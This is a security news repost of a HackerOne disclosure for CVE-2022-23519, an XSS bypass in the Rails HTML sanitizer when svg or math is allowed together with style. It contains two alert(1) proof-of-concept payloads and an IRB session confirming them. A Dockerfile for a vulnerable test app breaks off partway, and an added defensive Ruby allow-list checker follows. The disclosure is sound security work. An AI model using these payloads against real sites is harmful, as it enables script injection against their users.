🕵️ Internet Bug Bounty: CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)
News section: 🕵️ Security vulnerabilities
🔗 Source: vulners.com
The following is from: https://hackerone.com/reports/1656627

Intro

The Rails HTML sanitizer allows setting certain combinations of tags in its allow list that are not properly handled. Similar to the report 1530898, which identified the combination select and style as vulnerable, my fuzz testing from today suggests that also svg and style as well as math and style allow XSS.

The following are PoCs for each of these allow lists:

- svg and style: <svg><style><script>alert(1)</script></style></svg>
- math and style: <math><style><img src=x onerror=alert(1)></style></math>

See the following IRB session:

```
irb(main):016:0> require 'rails-html-sanitizer'
=> false
irb(main):017:0> Rails::Html::SafeListSanitizer.new.sanitize("<svg><style><script>alert(1)</script></style></svg>", tags: ["svg", "style"]).to_s
=> "<svg><style><script>alert(1)</script></style></svg>"
irb(main):018:0> Rails::Html::SafeListSanitizer.new.sanitize("<math><style><img src=x onerror=alert(1)></style></math>", tags: ["math", "style"]).to_s
=> "<math><style><img src=x onerror=alert(1)></style></math>"
irb(main):019:0> puts Rails::Html::Sanitizer::VERSION
1.4.3
=> nil
```

Sample Vulnerable Rails Application

To build a sample rails application that is vulnerable, I've used the following Dockerfile:

```
FROM ruby:3.1.2
RUN apt-get update && apt-get install -y vim
WORKDIR /usr/src/app
RUN gem install rails && rails new myapp
WORKDIR /usr/src/app/myapp
COPY build-rails-app.sh ./build-rails-app.sh
RUN sh... ...
```
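As an added defensive example (not part of the HackerOne report or of rails-html-sanitizer itself), the following Ruby helper audits a custom `tags:` allow list for the combinations named above (select+style from report 1530898, svg+style and math+style from this report) and drops `style` whenever it would complete one of them, so the hardened list can be passed to `sanitize`. The constant and function names are assumptions of this example.

```ruby
require 'set'

# Tag pairs reported as unsafe when both are allowed at once in the
# SafeListSanitizer: select+style (report 1530898), svg+style and
# math+style (this report). Constructed for this example.
UNSAFE_TAG_COMBINATIONS = [
  %w[select style],
  %w[svg style],
  %w[math style],
].freeze

# Returns every entry of UNSAFE_TAG_COMBINATIONS that is fully contained
# in +tags+ (case-insensitive), i.e. the combinations an allow list enables.
def unsafe_combinations(tags)
  allowed = tags.map { |t| t.to_s.downcase }.to_set
  UNSAFE_TAG_COMBINATIONS.select { |combo| combo.all? { |t| allowed.include?(t) } }
end

# Returns a copy of +tags+ with 'style' removed when the list would otherwise
# enable an unsafe combination. 'style' is the element the reported payloads
# are smuggled through, so dropping it keeps svg/math/select usable on their own.
def harden_allowlist(tags)
  return tags.dup if unsafe_combinations(tags).empty?
  tags.reject { |t| t.to_s.downcase == 'style' }
end

# Convenience wrapper: the hardened list plus what was removed and why,
# suitable for logging at application boot.
def sanitizer_options(tags)
  hardened = harden_allowlist(tags)
  {
    tags: hardened,
    removed: tags - hardened,
    unsafe: unsafe_combinations(tags).map { |combo| combo.join('+') },
  }
end

if __FILE__ == $PROGRAM_NAME
  # Usage: a developer asked for svg, style and p; only svg and p survive.
  p sanitizer_options(%w[svg style p])
  # => {:tags=>["svg", "p"], :removed=>["style"], :unsafe=>["svg+style"]}
end
```

With the gem installed, the hardened list is used as `Rails::Html::SafeListSanitizer.new.sanitize(html, tags: sanitizer_options(requested)[:tags])`.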